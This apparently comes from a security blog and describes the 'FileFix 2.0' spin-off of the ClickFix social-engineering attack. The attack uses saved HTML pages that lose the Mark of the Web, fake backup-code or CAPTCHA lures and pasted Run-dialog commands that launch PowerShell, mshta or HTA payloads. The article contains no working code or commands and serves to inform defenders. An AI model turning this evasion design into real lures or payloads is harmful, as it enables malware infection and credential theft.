A new variant of the ClickFix social engineering attack manipulates users into bypassing browser security by copying and executing command such as PowerShell, HTA, or mshta.exe from fake verification pages. These deceptive prompts appear as CAPTCHAs or error messages and prompt victims to perform keystrokes like Win+R, Ctrl+V, and Enter. This spin-off technique is extremely effective, as it exploits human trust in familiar browser behaviors and bypasses traditional endpoint protections. Expect further refinements from the same actor.
The ClickFix spin-off, also dubbed FileFix 2.0 by security researcher Mr.d0x, takes advantage of a lesser-known quirk in modern browsers’ “Save As” functionality. When users choose to save a webpage whether via Ctrl+S or right-click → Save as Chrome and Edge often strip out the Mark of the Web (MoTW) metadata that Windows uses to flag Internet-downloaded files as potentially unsafe. Without this marker, saved HTML files open without any security warning, allowing malicious actors to craft pages that look benign such as “Backup Codes” screens or CAPTCHA prompts but actually carry embedded attacker-controlled scripts. Once the user saves and opens the file, that script runs in the local context, bypassing standard browser sandboxing and security checks.
In one variation of this technique, the attacker presents a cloned authentication page complete with logos and styling from Google or Microsoft that tells users to save their one-time backup codes for safekeeping. Because the file’s title tag defines the default filename, users end up with a file named “Save Backup Codes.html,” reinforcing the illusion of legitimacy. When the file is opened, hidden JavaScript executes system commands via the user’s default handler (e.g., launching PowerShell or HTA), which then downloads and runs a secondary payload commonly an information stealer or remote access trojan without any visible prompts or security warnings.
Another spin-off mimics fake browser “updates” or error messages, instructing users to launch the Windows Run dialog (Win+R), paste a clipboard-injected command, and press Enter just like the original ClickFix technique. However, instead of relying solely on in-browser JavaScript for the initial fetch, FileFix 2.0 delivers a local HTML file, meaning commands execute outside of the browser’s normal download and execution model. This hybrid approach effectively evades both Content Security Policy (CSP) restrictions and Safe Browsing mechanisms since no direct download from a remote server occurs at the moment of execution.
Because the saved HTML file lacks MoTW, even corporate environments that enforce strict download controls can be bypassed. Endpoint protection tools rarely flag locally opened HTML files as suspicious, and static analysis of the HTML appears benign. The true malicious content scripts that invoke mshta.exe, powershell.exe, or hidden HTA files is only revealed at runtime, blending in with legitimate user behavior. Adding to the stealth, the attacker can obfuscate the payload URL and commands within Base64-encoded snippets, decrypting them client-side only when the user opens the file. This on-demand, user-assisted execution chain represents an evolution of ClickFix, emphasizing social engineering over software flaws and demonstrating that the user remains the weakest link in browser security.
This spin-off amplifies the threat of ClickFix by exposing browser and endpoint defenses to a silent command injection chain. Attackers can infect systems with powerful payloads by persuading users to perform simple keystrokes actions that are incredibly difficult to prevent via technical controls alone. The range of malware deployed spanning from stealthy information stealers to full-featured RATs and ransomware means that even a single misstep can cascade into full network compromise.
https://sra.io/blog/beware-of-clickfix-a-growing-social-engineering-threat/
